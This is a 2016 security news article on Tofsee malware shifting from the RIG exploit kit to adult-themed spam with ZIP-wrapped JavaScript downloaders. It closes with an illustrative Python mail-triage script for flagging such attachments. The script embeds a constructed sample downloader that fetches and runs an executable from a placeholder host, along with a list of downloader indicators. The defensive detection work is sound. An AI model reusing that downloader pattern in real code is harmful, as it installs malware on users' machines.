Switch in Malware Distribution

Monday, October 3, 2016 @ 03:10 PM gHale

After the exploit kit that had been delivering Tofsee stopped doing so, the attackers behind the malware switched to its own spam botnet to distribute the payload, researchers said.

Tofsee, malware that has been in circulation since 2013, gives attackers a multipurpose bot that can conduct click fraud, mine cryptocurrency, launch DDoS attacks and send spam, said researchers at Cisco’s Talos team.


Up until June 2016, attackers distributed the malware through the RIG exploit kit and malvertising campaigns. Then, after the Angler exploit kit disappeared, the operators of RIG shifted to delivering other payloads.

After RIG stopped delivering Tofsee, the cybercriminals turned to email spam campaigns to infect computers. The Tofsee botnet had always been used to send spam; in August, however, researchers found the content of those messages changed and they began carrying Tofsee downloaders.

The volume of these spam emails has increased since mid-August, reaching more than 2,000 messages on some days in September, Talos researchers said.

The spam emails are adult-themed and purport to come from women in Russia and Ukraine. Recipients are instructed to download and open the ZIP archive attached to the message, which supposedly contains pictures of the sender.

Instead of pictures, the archive contains an obfuscated JavaScript file that acts as a WScript (Windows Script Host) downloader: it fetches an executable from a remote server controlled by the attacker and runs it. On a default Windows installation, double-clicking a .js file executes it with Windows Script Host, so simply opening the attachment is enough to trigger the download. Once the fetched file executes, the system is infected with Tofsee.
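As an added example of how a mail gateway or triage script can flag this kind of attachment without executing it (this is illustrative code written for this article, not code from Talos or from the Tofsee sample): it unpacks a ZIP in memory, picks out script-type members, undoes the simplest obfuscation trick (string literals split with `+`) and scores each script against indicator strings typical of WScript downloaders. The indicator list, the file extensions, the sample script and the ZIP are all constructed assumptions for the example.

```python
import io
import re
import zipfile

# Indicators typical of WScript-based downloaders. This list is an assumption
# for the example, not a signature taken from the Talos report.
DOWNLOADER_INDICATORS = [
    r"WScript\.Shell",
    r"MSXML2\.XMLHTTP",
    r"ADODB\.Stream",
    r"Scripting\.FileSystemObject",
    r"\.Run\s*\(",
    r"\.exe\b",
]

# Extensions Windows Script Host (or mshta) will execute on double-click.
SCRIPT_EXTENSIONS = (".js", ".jse", ".wsf", ".vbs", ".vbe", ".hta")

# Constructed sample: a downloader whose object names are split across
# concatenated string literals so naive grep on "WScript.Shell" would miss it.
SAMPLE_JS = (
    'var s = new ActiveXObject("WScr" + "ipt.Sh" + "ell");\n'
    'var x = new ActiveXObject("MSXML2" + ".XMLHTTP");\n'
    'x.open("GET", "http://example.invalid/photo.exe", false); x.send();\n'
    'var a = new ActiveXObject("ADODB" + ".Stream"); a.open(); a.type = 1;\n'
    'a.write(x.responseBody); a.saveToFile("%TEMP%\\\\photo.exe", 2);\n'
    's.Run("%TEMP%\\\\photo.exe");\n'
)


def build_sample_zip() -> bytes:
    """Build a constructed attachment in memory: one script plus one harmless file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("photos_for_you.jpg.js", SAMPLE_JS)
        zf.writestr("readme.txt", "nothing to see here")
    return buf.getvalue()


def script_entries(zip_bytes: bytes) -> list:
    """Return the names of script-type members inside a ZIP attachment."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith(SCRIPT_EXTENSIONS)]


def normalize(js_source: str) -> str:
    """Join adjacent string literals ("WScr" + "ipt") so split names become visible."""
    return re.sub(r"""["']\s*\+\s*["']""", "", js_source)


def downloader_indicators(js_source: str) -> list:
    """Return the indicator patterns that match the (normalized) script text."""
    text = normalize(js_source)
    return [p for p in DOWNLOADER_INDICATORS if re.search(p, text, re.IGNORECASE)]


def triage_attachment(zip_bytes: bytes, min_hits: int = 2) -> dict:
    """Score every script member of a ZIP. The archive is only read, never executed."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in script_entries(zip_bytes):
            # Read at most 1 MiB so an oversized or bomb-like member cannot exhaust memory.
            raw = zf.open(name).read(1024 * 1024)
            hits = downloader_indicators(raw.decode("latin-1", errors="replace"))
            findings[name] = {"indicators": hits, "suspicious": len(hits) >= min_hits}
    return findings


if __name__ == "__main__":
    for name, result in triage_attachment(build_sample_zip()).items():
        print(name, "SUSPICIOUS" if result["suspicious"] else "clean", result["indicators"])
```

The `normalize` step is deliberately minimal; real samples use character-code arrays, `eval` of decoded blobs and similar tricks that plain string matching will not see through. The filename check is the cheaper and more robust control: a mail filter that simply quarantines archives containing `.js`, `.jse`, `.wsf` or `.vbs` members catches this campaign regardless of how the script body is obfuscated.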